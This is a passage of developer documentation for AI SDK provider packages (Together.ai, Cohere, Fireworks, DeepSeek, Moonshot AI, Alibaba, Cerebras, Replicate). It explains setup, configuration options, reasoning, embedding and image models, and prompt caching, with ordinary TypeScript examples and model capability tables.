- baseURL string: Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.together.xyz/v1.
- apiKey string: API key that is being sent using the Authorization header. It defaults to the TOGETHER_API_KEY environment variable.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create Together.ai models using a provider instance. The first argument is the model id, e.g. google/gemma-2-9b-it.
const model = togetherai('google/gemma-2-9b-it');
Reasoning Models
Together.ai exposes the thinking of deepseek-ai/DeepSeek-R1 in the generated text using the <think> tag.
You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:
import { togetherai } from '@ai-sdk/togetherai';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const enhancedModel = wrapLanguageModel({
model: togetherai('deepseek-ai/DeepSeek-R1'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
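For example, a minimal sketch using the enhanced model with generateText (the reasoning is exposed as reasoningText on the result):
import { togetherai } from '@ai-sdk/togetherai';
import { generateText, wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const { text, reasoningText } = await generateText({
  model: wrapLanguageModel({
    model: togetherai('deepseek-ai/DeepSeek-R1'),
    middleware: extractReasoningMiddleware({ tagName: 'think' }),
  }),
  prompt: 'How many "r"s are in the word "strawberry"?',
});
console.log('REASONING:', reasoningText);
console.log('ANSWER:', text);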
Example
You can use Together.ai language models to generate text with the generateText function:
import { togetherai } from '@ai-sdk/togetherai';
import { generateText } from 'ai';
const { text } = await generateText({
model: togetherai('meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Together.ai language models can also be used in the streamText function
(see AI SDK Core).
The Together.ai provider also supports completion models via togetherai.completion() and embedding models via togetherai.textEmbedding(), following the pattern in the example code above.
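As a sketch (the model id is illustrative; pass any Together.ai model id that supports the completions API):
import { togetherai } from '@ai-sdk/togetherai';
import { generateText } from 'ai';
const { text } = await generateText({
  model: togetherai.completion('meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'),
  prompt: 'Write a haiku about the ocean.',
});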
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| meta-llama/Meta-Llama-3.3-70B-Instruct-Turbo | | | | |
| meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo | | | | |
| mistralai/Mixtral-8x22B-Instruct-v0.1 | | | | |
| mistralai/Mistral-7B-Instruct-v0.3 | | | | |
| deepseek-ai/DeepSeek-V3 | | | | |
| google/gemma-2b-it | | | | |
| Qwen/Qwen2.5-72B-Instruct-Turbo | | | | |
| databricks/dbrx-instruct | | | | |
Image Models
You can create Together.ai image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
import { togetherai } from '@ai-sdk/togetherai';
import { experimental_generateImage as generateImage } from 'ai';
const { images } = await generateImage({
model: togetherai.image('black-forest-labs/FLUX.1-dev'),
prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
});
You can pass optional provider-specific request parameters using the providerOptions argument.
import { togetherai } from '@ai-sdk/togetherai';
import { experimental_generateImage as generateImage } from 'ai';
const { images } = await generateImage({
model: togetherai.image('black-forest-labs/FLUX.1-dev'),
prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
size: '512x512',
// Optional additional provider-specific request parameters
providerOptions: {
togetherai: {
steps: 40,
},
},
});
For a complete list of available provider-specific options, see the Together.ai Image Generation API Reference.
Model Capabilities
Together.ai image models support various image dimensions that vary by model. Common sizes include 512x512, 768x768, and 1024x1024, with some models supporting up to 1792x1792. The default size is 1024x1024.
| Available Models |
|---|
| stabilityai/stable-diffusion-xl-base-1.0 |
| black-forest-labs/FLUX.1-dev |
| black-forest-labs/FLUX.1-dev-lora |
| black-forest-labs/FLUX.1-schnell |
| black-forest-labs/FLUX.1-canny |
| black-forest-labs/FLUX.1-depth |
| black-forest-labs/FLUX.1-redux |
| black-forest-labs/FLUX.1.1-pro |
| black-forest-labs/FLUX.1-pro |
| black-forest-labs/FLUX.1-schnell-Free |
Embedding Models
You can create Together.ai embedding models using the .textEmbedding() factory method.
For more on embedding models with the AI SDK see embed().
import { togetherai } from '@ai-sdk/togetherai';
import { embed } from 'ai';
const { embedding } = await embed({
model: togetherai.textEmbedding('togethercomputer/m2-bert-80M-2k-retrieval'),
value: 'sunny day at the beach',
});
Model Capabilities
| Model | Dimensions | Max Tokens |
|---|---|---|
| togethercomputer/m2-bert-80M-2k-retrieval | 768 | 2048 |
| togethercomputer/m2-bert-80M-8k-retrieval | 768 | 8192 |
| togethercomputer/m2-bert-80M-32k-retrieval | 768 | 32768 |
| WhereIsAI/UAE-Large-V1 | 1024 | 512 |
| BAAI/bge-large-en-v1.5 | 1024 | 512 |
| BAAI/bge-base-en-v1.5 | 768 | 512 |
| sentence-transformers/msmarco-bert-base-dot-v5 | 768 | 512 |
| bert-base-uncased | 768 | 512 |
title: Cohere description: Learn how to use the Cohere provider for the AI SDK.
Cohere Provider
The Cohere provider contains language and embedding model support for the Cohere chat API.
Setup
The Cohere provider is available in the @ai-sdk/cohere module. You can install it with
pnpm add @ai-sdk/cohere
Provider Instance
You can import the default provider instance cohere from @ai-sdk/cohere:
import { cohere } from '@ai-sdk/cohere';
If you need a customized setup, you can import createCohere from @ai-sdk/cohere
and create a provider instance with your settings:
import { createCohere } from '@ai-sdk/cohere';
const cohere = createCohere({
// custom settings
});
You can use the following optional settings to customize the Cohere provider instance:
- baseURL string: Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.cohere.com/v2.
- apiKey string: API key that is being sent using the Authorization header. It defaults to the COHERE_API_KEY environment variable.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Cohere chat API using a provider instance.
The first argument is the model id, e.g. command-r-plus.
Some Cohere chat models support tool calls.
const model = cohere('command-r-plus');
Example
You can use Cohere language models to generate text with the generateText function:
import { cohere } from '@ai-sdk/cohere';
import { generateText } from 'ai';
const { text } = await generateText({
model: cohere('command-r-plus'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Cohere language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
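For example, a minimal generateObject sketch (the schema and prompt are illustrative):
import { cohere } from '@ai-sdk/cohere';
import { generateObject } from 'ai';
import { z } from 'zod';
const { object } = await generateObject({
  model: cohere('command-r-plus'),
  schema: z.object({
    name: z.string(),
    ingredients: z.array(z.string()),
  }),
  prompt: 'Generate a simple pasta recipe.',
});
console.log(object);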
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| command-a-03-2025 | | | | |
| command-a-reasoning-08-2025 | | | | |
| command-r7b-12-2024 | | | | |
| command-r-plus-04-2024 | | | | |
| command-r-plus | | | | |
| command-r-08-2024 | | | | |
| command-r-03-2024 | | | | |
| command-r | | | | |
| command | | | | |
| command-nightly | | | | |
| command-light | | | | |
| command-light-nightly | | | | |
Reasoning
Cohere has introduced reasoning with the command-a-reasoning-08-2025 model. You can learn more at https://docs.cohere.com/docs/reasoning.
import { cohere } from '@ai-sdk/cohere';
import { generateText } from 'ai';
async function main() {
const { text, reasoning } = await generateText({
model: cohere('command-a-reasoning-08-2025'),
prompt:
"Alice has 3 brothers and she also has 2 sisters. How many sisters does Alice's brother have?",
// optional: reasoning options
providerOptions: {
cohere: {
thinking: {
type: 'enabled',
tokenBudget: 100,
},
},
},
});
console.log(reasoning);
console.log(text);
}
main().catch(console.error);
Embedding Models
You can create models that call the Cohere embed API
using the .textEmbedding() factory method.
const model = cohere.textEmbedding('embed-english-v3.0');
You can use Cohere embedding models to generate embeddings with the embed function:
import { cohere } from '@ai-sdk/cohere';
import { embed } from 'ai';
const { embedding } = await embed({
model: cohere.textEmbedding('embed-english-v3.0'),
value: 'sunny day at the beach',
providerOptions: {
cohere: {
inputType: 'search_document',
},
},
});
Cohere embedding models support additional provider options that can be passed via providerOptions.cohere:
import { cohere } from '@ai-sdk/cohere';
import { embed } from 'ai';
const { embedding } = await embed({
model: cohere.textEmbedding('embed-english-v3.0'),
value: 'sunny day at the beach',
providerOptions: {
cohere: {
inputType: 'search_document',
truncate: 'END',
},
},
});
The following provider options are available:
- inputType 'search_document' | 'search_query' | 'classification' | 'clustering': Specifies the type of input passed to the model. Default is search_query.
  - search_document: Used for embeddings stored in a vector database for search use-cases.
  - search_query: Used for embeddings of search queries run against a vector DB to find relevant documents.
  - classification: Used for embeddings passed through a text classifier.
  - clustering: Used for embeddings run through a clustering algorithm.
- truncate 'NONE' | 'START' | 'END': Specifies how the API will handle inputs longer than the maximum token length. Default is END.
  - NONE: If selected, an error is returned when the input exceeds the maximum input token length.
  - START: Will discard the start of the input until the remaining input is exactly the maximum input token length for the model.
  - END: Will discard the end of the input until the remaining input is exactly the maximum input token length for the model.
Model Capabilities
| Model | Embedding Dimensions |
|---|---|
| embed-english-v3.0 | 1024 |
| embed-multilingual-v3.0 | 1024 |
| embed-english-light-v3.0 | 384 |
| embed-multilingual-light-v3.0 | 384 |
| embed-english-v2.0 | 4096 |
| embed-english-light-v2.0 | 1024 |
| embed-multilingual-v2.0 | 768 |
title: Fireworks description: Learn how to use Fireworks models with the AI SDK.
Fireworks Provider
Fireworks is a platform for running and testing LLMs through their API.
Setup
The Fireworks provider is available via the @ai-sdk/fireworks module. You can install it with
pnpm add @ai-sdk/fireworks
Provider Instance
You can import the default provider instance fireworks from @ai-sdk/fireworks:
import { fireworks } from '@ai-sdk/fireworks';
If you need a customized setup, you can import createFireworks from @ai-sdk/fireworks
and create a provider instance with your settings:
import { createFireworks } from '@ai-sdk/fireworks';
const fireworks = createFireworks({
apiKey: process.env.FIREWORKS_API_KEY ?? '',
});
You can use the following optional settings to customize the Fireworks provider instance:
- baseURL string: Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.fireworks.ai/inference/v1.
- apiKey string: API key that is being sent using the Authorization header. It defaults to the FIREWORKS_API_KEY environment variable.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation.
Language Models
You can create Fireworks models using a provider instance.
The first argument is the model id, e.g. accounts/fireworks/models/firefunction-v1:
const model = fireworks('accounts/fireworks/models/firefunction-v1');
Reasoning Models
Fireworks exposes the thinking of deepseek-r1 in the generated text using the <think> tag.
You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:
import { fireworks } from '@ai-sdk/fireworks';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const enhancedModel = wrapLanguageModel({
model: fireworks('accounts/fireworks/models/deepseek-r1'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
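For example, streaming with the enhanced model (a minimal sketch following the middleware setup above; the reasoning and text parts follow the standard fullStream part types):
import { fireworks } from '@ai-sdk/fireworks';
import { streamText, wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const result = streamText({
  model: wrapLanguageModel({
    model: fireworks('accounts/fireworks/models/deepseek-r1'),
    middleware: extractReasoningMiddleware({ tagName: 'think' }),
  }),
  prompt: 'How many "r"s are in the word "strawberry"?',
});
for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    console.log('Reasoning:', part.text);
  } else if (part.type === 'text') {
    console.log('Answer:', part.text);
  }
}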
Example
You can use Fireworks language models to generate text with the generateText function:
import { fireworks } from '@ai-sdk/fireworks';
import { generateText } from 'ai';
const { text } = await generateText({
model: fireworks('accounts/fireworks/models/firefunction-v1'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Fireworks language models can also be used in the streamText function
(see AI SDK Core).
Completion Models
You can create models that call the Fireworks completions API using the .completion() factory method:
const model = fireworks.completion('accounts/fireworks/models/firefunction-v1');
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| accounts/fireworks/models/firefunction-v1 | | | | |
| accounts/fireworks/models/deepseek-r1 | | | | |
| accounts/fireworks/models/deepseek-v3 | | | | |
| accounts/fireworks/models/llama-v3p1-405b-instruct | | | | |
| accounts/fireworks/models/llama-v3p1-8b-instruct | | | | |
| accounts/fireworks/models/llama-v3p2-3b-instruct | | | | |
| accounts/fireworks/models/llama-v3p3-70b-instruct | | | | |
| accounts/fireworks/models/mixtral-8x7b-instruct | | | | |
| accounts/fireworks/models/mixtral-8x7b-instruct-hf | | | | |
| accounts/fireworks/models/mixtral-8x22b-instruct | | | | |
| accounts/fireworks/models/qwen2p5-coder-32b-instruct | | | | |
| accounts/fireworks/models/qwen2p5-72b-instruct | | | | |
| accounts/fireworks/models/qwen-qwq-32b-preview | | | | |
| accounts/fireworks/models/qwen2-vl-72b-instruct | | | | |
| accounts/fireworks/models/llama-v3p2-11b-vision-instruct | | | | |
| accounts/fireworks/models/qwq-32b | | | | |
| accounts/fireworks/models/yi-large | | | | |
| accounts/fireworks/models/kimi-k2-instruct | | | | |
Embedding Models
You can create models that call the Fireworks embeddings API using the .textEmbedding() factory method:
const model = fireworks.textEmbedding('nomic-ai/nomic-embed-text-v1.5');
You can use Fireworks embedding models to generate embeddings with the embed function:
import { fireworks } from '@ai-sdk/fireworks';
import { embed } from 'ai';
const { embedding } = await embed({
model: fireworks.textEmbedding('nomic-ai/nomic-embed-text-v1.5'),
value: 'sunny day at the beach',
});
Model Capabilities
| Model | Dimensions | Max Tokens |
|---|---|---|
| nomic-ai/nomic-embed-text-v1.5 | 768 | 8192 |
Image Models
You can create Fireworks image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
import { fireworks } from '@ai-sdk/fireworks';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: fireworks.image('accounts/fireworks/models/flux-1-dev-fp8'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
Model Capabilities
For all models supporting aspect ratios, the following aspect ratios are supported:
1:1 (default), 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
For all models supporting size, the following sizes are supported:
640x1536, 768x1344, 832x1216, 896x1152, 1024x1024 (default), 1152x896, 1216x832, 1344x768, 1536x640
| Model | Dimensions Specification |
|---|---|
| accounts/fireworks/models/flux-1-dev-fp8 | Aspect Ratio |
| accounts/fireworks/models/flux-1-schnell-fp8 | Aspect Ratio |
| accounts/fireworks/models/playground-v2-5-1024px-aesthetic | Size |
| accounts/fireworks/models/japanese-stable-diffusion-xl | Size |
| accounts/fireworks/models/playground-v2-1024px-aesthetic | Size |
| accounts/fireworks/models/SSD-1B | Size |
| accounts/fireworks/models/stable-diffusion-xl-1024-v1-0 | Size |
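As a sketch for the size-based models in the table above (the size value is one of the supported sizes listed earlier):
import { fireworks } from '@ai-sdk/fireworks';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
  model: fireworks.image(
    'accounts/fireworks/models/playground-v2-5-1024px-aesthetic',
  ),
  prompt: 'A futuristic cityscape at sunset',
  size: '1024x1024',
});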
For more details, see the Fireworks models page.
Stability AI Models
Fireworks also offers several Stability AI models backed by Stability AI API keys and endpoints. The AI SDK Fireworks provider does not currently support these models:
| Model ID |
|---|
| accounts/stability/models/sd3-turbo |
| accounts/stability/models/sd3-medium |
| accounts/stability/models/sd3 |
title: DeepSeek description: Learn how to use DeepSeek's models with the AI SDK.
DeepSeek Provider
The DeepSeek provider offers access to powerful language models through the DeepSeek API.
API keys can be obtained from the DeepSeek Platform.
Setup
The DeepSeek provider is available via the @ai-sdk/deepseek module. You can install it with:
pnpm add @ai-sdk/deepseek
Provider Instance
You can import the default provider instance deepseek from @ai-sdk/deepseek:
import { deepseek } from '@ai-sdk/deepseek';
For custom configuration, you can import createDeepSeek and create a provider instance with your settings:
import { createDeepSeek } from '@ai-sdk/deepseek';
const deepseek = createDeepSeek({
apiKey: process.env.DEEPSEEK_API_KEY ?? '',
});
You can use the following optional settings to customize the DeepSeek provider instance:
- baseURL string: Use a different URL prefix for API calls. The default prefix is https://api.deepseek.com/v1.
- apiKey string: API key that is being sent using the Authorization header. It defaults to the DEEPSEEK_API_KEY environment variable.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation.
Language Models
You can create language models using a provider instance:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const { text } = await generateText({
model: deepseek('deepseek-chat'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can also use the .chat() or .languageModel() factory methods:
const model = deepseek.chat('deepseek-chat');
// or
const model = deepseek.languageModel('deepseek-chat');
DeepSeek language models can be used in the streamText function
(see AI SDK Core).
Reasoning
DeepSeek has reasoning support for the deepseek-reasoner model. The reasoning is exposed through streaming:
import { deepseek } from '@ai-sdk/deepseek';
import { streamText } from 'ai';
const result = streamText({
model: deepseek('deepseek-reasoner'),
prompt: 'How many "r"s are in the word "strawberry"?',
});
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
// This is the reasoning text
console.log('Reasoning:', part.text);
} else if (part.type === 'text') {
// This is the final answer
console.log('Answer:', part.text);
}
}
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Cache Token Usage
DeepSeek provides on-disk context caching that can significantly reduce token costs for repeated content. You can access the cache hit/miss metrics through the providerMetadata property in the response:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const result = await generateText({
model: deepseek('deepseek-chat'),
prompt: 'Your prompt here',
});
console.log(result.providerMetadata);
// Example output: { deepseek: { promptCacheHitTokens: 1856, promptCacheMissTokens: 5 } }
The metrics include:
- promptCacheHitTokens: Number of input tokens that were cached
- promptCacheMissTokens: Number of input tokens that were not cached
Model Capabilities
| Model | Text Generation | Object Generation | Image Input | Tool Usage | Tool Streaming |
|---|---|---|---|---|---|
| deepseek-chat | | | | | |
| deepseek-reasoner | | | | | |
title: Moonshot AI description: Learn how to use Moonshot AI models with the AI SDK.
Moonshot AI Provider
The Moonshot AI provider offers access to powerful language models through the Moonshot API, including the Kimi series of models with reasoning capabilities.
API keys can be obtained from the Moonshot Platform.
Setup
The Moonshot AI provider is available via the @ai-sdk/moonshotai module. You can install it with:
pnpm add @ai-sdk/moonshotai
Provider Instance
You can import the default provider instance moonshotai from @ai-sdk/moonshotai:
import { moonshotai } from '@ai-sdk/moonshotai';
For custom configuration, you can import createMoonshotAI and create a provider instance with your settings:
import { createMoonshotAI } from '@ai-sdk/moonshotai';
const moonshotai = createMoonshotAI({
apiKey: process.env.MOONSHOT_API_KEY ?? '',
});
You can use the following optional settings to customize the Moonshot AI provider instance:
- baseURL string: Use a different URL prefix for API calls. The default prefix is https://api.moonshot.ai/v1.
- apiKey string: API key that is being sent using the Authorization header. It defaults to the MOONSHOT_API_KEY environment variable.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation.
Language Models
You can create language models using a provider instance:
import { moonshotai } from '@ai-sdk/moonshotai';
import { generateText } from 'ai';
const { text } = await generateText({
model: moonshotai('kimi-k2.5'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can also use the .chatModel() or .languageModel() factory methods:
const model = moonshotai.chatModel('kimi-k2.5');
// or
const model = moonshotai.languageModel('kimi-k2.5');
Moonshot AI language models can be used in the streamText function
(see AI SDK Core).
Reasoning Models
Moonshot AI offers thinking models like kimi-k2-thinking that generate intermediate reasoning tokens before their final response. The reasoning output is streamed through the standard AI SDK reasoning parts.
import { moonshotai, type MoonshotAIProviderOptions } from '@ai-sdk/moonshotai';
import { generateText } from 'ai';
const { text, reasoningText } = await generateText({
model: moonshotai('kimi-k2-thinking'),
providerOptions: {
moonshotai: {
thinking: { type: 'enabled', budgetTokens: 2048 },
reasoningHistory: 'interleaved',
} satisfies MoonshotAIProviderOptions,
},
prompt: 'How many "r"s are in the word "strawberry"?',
});
console.log(reasoningText);
console.log(text);
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Provider Options
The following optional provider options are available for Moonshot AI language models:
- thinking object: Configuration for thinking/reasoning models like Kimi K2 Thinking.
  - type 'enabled' | 'disabled': Whether to enable thinking mode.
  - budgetTokens number: Maximum number of tokens for thinking (minimum 1024).
- reasoningHistory 'disabled' | 'interleaved' | 'preserved': Controls how reasoning history is handled in multi-turn conversations:
  - 'disabled': Remove reasoning from history.
  - 'interleaved': Include reasoning between tool calls within a single turn.
  - 'preserved': Keep all reasoning in history.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| moonshot-v1-8k | | | | |
| moonshot-v1-32k | | | | |
| moonshot-v1-128k | | | | |
| kimi-k2 | | | | |
| kimi-k2.5 | | | | |
| kimi-k2-thinking | | | | |
| kimi-k2-thinking-turbo | | | | |
| kimi-k2-turbo | | | | |
title: Alibaba description: Learn how to use Alibaba Cloud Model Studio (Qwen) models with the AI SDK.
Alibaba Provider
Alibaba Cloud Model Studio provides access to the Qwen model series, including advanced reasoning capabilities.
API keys can be obtained from the Console.
Setup
The Alibaba provider is available via the @ai-sdk/alibaba module. You can install it with:
pnpm add @ai-sdk/alibaba
Provider Instance
You can import the default provider instance alibaba from @ai-sdk/alibaba:
import { alibaba } from '@ai-sdk/alibaba';
For custom configuration, you can import createAlibaba and create a provider instance with your settings:
import { createAlibaba } from '@ai-sdk/alibaba';
const alibaba = createAlibaba({
apiKey: process.env.ALIBABA_API_KEY ?? '',
});
You can use the following optional settings to customize the Alibaba provider instance:
- baseURL string: Use a different URL prefix for API calls, e.g. to use proxy servers or regional endpoints. The default prefix is https://dashscope-intl.aliyuncs.com/compatible-mode/v1.
- apiKey string: API key that is being sent using the Authorization header. It defaults to the ALIBABA_API_KEY environment variable.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation.
- includeUsage boolean: Include usage information in streaming responses. When enabled, token usage will be included in the final chunk. Defaults to true.
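As a sketch, assuming you want usage reporting in streaming responses (includeUsage defaults to true, so this only makes the setting explicit):
import { createAlibaba } from '@ai-sdk/alibaba';
import { streamText } from 'ai';
const alibaba = createAlibaba({ includeUsage: true });
const result = streamText({
  model: alibaba('qwen-plus'),
  prompt: 'Write a one-sentence summary of the water cycle.',
});
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}
// token usage is delivered in the final chunk and resolved here
console.log(await result.usage);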
Language Models
You can create language models using a provider instance:
import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';
const { text } = await generateText({
model: alibaba('qwen-plus'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can also use the .chatModel() or .languageModel() factory methods:
const model = alibaba.chatModel('qwen-plus');
// or
const model = alibaba.languageModel('qwen-plus');
Alibaba language models can be used in the streamText function
(see AI SDK Core).
The following optional provider options are available for Alibaba models:
- enableThinking boolean: Enable thinking/reasoning mode for supported models. When enabled, the model generates reasoning content before the response. Defaults to false.
- thinkingBudget number: Maximum number of reasoning tokens to generate. Limits the length of thinking content.
- parallelToolCalls boolean: Whether to enable parallel function calling during tool use. Defaults to true.
Thinking Mode
Alibaba's Qwen models support thinking/reasoning mode for complex problem-solving:
import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';
const { text, reasoning } = await generateText({
model: alibaba('qwen3-max'),
providerOptions: {
alibaba: {
enableThinking: true,
thinkingBudget: 2048,
},
},
prompt: 'How many "r"s are in the word "strawberry"?',
});
console.log('Reasoning:', reasoning);
console.log('Answer:', text);
For models that are thinking-only (like qwen3-235b-a22b-thinking-2507), thinking mode is enabled by default.
Tool Calling
Alibaba models support tool calling with parallel execution:
import { alibaba } from '@ai-sdk/alibaba';
import { generateText, tool } from 'ai';
import { z } from 'zod';
const { text } = await generateText({
model: alibaba('qwen-plus'),
tools: {
weather: tool({
description: 'Get the weather in a location',
parameters: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
prompt: 'What is the weather in San Francisco?',
});
Prompt Caching
Alibaba supports both implicit and explicit prompt caching to reduce costs for repeated prompts.
Implicit caching works automatically - the provider caches appropriate content without any configuration. For more control, you can use explicit caching by marking specific messages with cache_control:
Single message cache control
import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';
const { text, usage } = await generateText({
model: alibaba('qwen-plus'),
messages: [
{
role: 'system',
content: 'You are a helpful assistant. [... long system prompt ...]',
providerOptions: {
alibaba: {
cache_control: { type: 'ephemeral' },
},
},
},
],
});
Multi-part message cache control
import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';
const longDocument = '... large document content ...';
const { text, usage } = await generateText({
model: alibaba('qwen-plus'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Context: Please analyze this document.',
},
{
type: 'text',
text: longDocument,
providerOptions: {
alibaba: {
cacheControl: { type: 'ephemeral' },
},
},
},
],
},
],
});
Note: The minimum content length for a cache block is 1,024 tokens.
Model Capabilities
Please see the Alibaba Cloud Model Studio docs for a full list of available models. You can also pass any available provider model ID as a string if needed.
title: Cerebras description: Learn how to use Cerebras's models with the AI SDK.
Cerebras Provider
The Cerebras provider offers access to powerful language models through the Cerebras API, including their high-speed inference capabilities powered by Wafer-Scale Engines and CS-3 systems.
API keys can be obtained from the Cerebras Platform.
Setup
The Cerebras provider is available via the @ai-sdk/cerebras module. You can install it with:
pnpm add @ai-sdk/cerebras
Provider Instance
You can import the default provider instance cerebras from @ai-sdk/cerebras:
import { cerebras } from '@ai-sdk/cerebras';
For custom configuration, you can import createCerebras and create a provider instance with your settings:
import { createCerebras } from '@ai-sdk/cerebras';
const cerebras = createCerebras({
apiKey: process.env.CEREBRAS_API_KEY ?? '',
});
You can use the following optional settings to customize the Cerebras provider instance:
- baseURL string: Use a different URL prefix for API calls. The default prefix is https://api.cerebras.ai/v1.
- apiKey string: API key that is being sent using the Authorization header. It defaults to the CEREBRAS_API_KEY environment variable.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation.
Language Models
You can create language models using a provider instance:
import { cerebras } from '@ai-sdk/cerebras';
import { generateText } from 'ai';
const { text } = await generateText({
model: cerebras('llama3.1-8b'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Cerebras language models can be used in the streamText function
(see AI SDK Core).
You can create Cerebras language models using a provider instance. The first argument is the model ID, e.g. llama-3.3-70b:
const model = cerebras('llama-3.3-70b');
You can also use the .languageModel() and .chat() methods:
const model = cerebras.languageModel('llama-3.3-70b');
const model = cerebras.chat('llama-3.3-70b');
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| llama3.1-8b | | | | |
| llama-3.3-70b | | | | |
| gpt-oss-120b | | | | |
| qwen-3-32b | | | | |
| qwen-3-235b-a22b-instruct-2507 | | | | |
| qwen-3-235b-a22b-thinking-2507 | | | | |
| zai-glm-4.6 | | | | |
title: Replicate description: Learn how to use Replicate models with the AI SDK.
Replicate Provider
Replicate is a platform for running open-source AI models. It is a popular choice for running image generation models.
Setup
The Replicate provider is available via the @ai-sdk/replicate module. You can install it with
pnpm add @ai-sdk/replicate
Provider Instance
You can import the default provider instance replicate from @ai-sdk/replicate:
import { replicate } from '@ai-sdk/replicate';
If you need a customized setup, you can import createReplicate from @ai-sdk/replicate
and create a provider instance with your settings:
import { createReplicate } from '@ai-sdk/replicate';
const replicate = createReplicate({
apiToken: process.env.REPLICATE_API_TOKEN ?? '',
});
You can use the following optional settings to customize the Replicate provider instance:
- baseURL string: Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.replicate.com/v1.
- apiToken string: API token that is being sent using the Authorization header. It defaults to the REPLICATE_API_TOKEN environment variable.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation.
Image Models
You can create Replicate image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Supported Image Models
The following image models are currently supported by the Replicate provider:
- black-forest-labs/flux-1.1-pro-ultra
- black-forest-labs/flux-1.1-pro
- black-forest-labs/flux-dev
- black-forest-labs/flux-pro
- black-forest-labs/flux-schnell
- bytedance/sdxl-lightning-4step
- fofr/aura-flow
- fofr/latent-consistency-model
- fofr/realvisxl-v3-multi-controlnet-lora
- fofr/sdxl-emoji
- fofr/sdxl-multi-controlnet-lora
- ideogram-ai/ideogram-v2-turbo
- ideogram-ai/ideogram-v2
- lucataco/dreamshaper-xl-turbo
- lucataco/open-dalle-v1.1
- lucataco/realvisxl-v2.0
- lucataco/realvisxl2-lcm
- luma/photon-flash
- luma/photon
- nvidia/sana
- playgroundai/playground-v2.5-1024px-aesthetic
- recraft-ai/recraft-v3-svg
- recraft-ai/recraft-v3
- stability-ai/stable-diffusion-3.5-large-turbo
- stability-ai/stable-diffusion-3.5-large
- stability-ai/stable-diffusion-3.5-medium
- tstramer/material-diffusion
You can also use versioned models.
The id for versioned models is the Replicate model id followed by a colon and the version ID ($modelId:$versionId), e.g.
bytedance/sdxl-lightning-4step:5599ed30703defd1d160a25a63321b4dec97101d98b4674bcc56e41f62f35637.
Basic Usage
import { replicate } from '@ai-sdk/replicate';
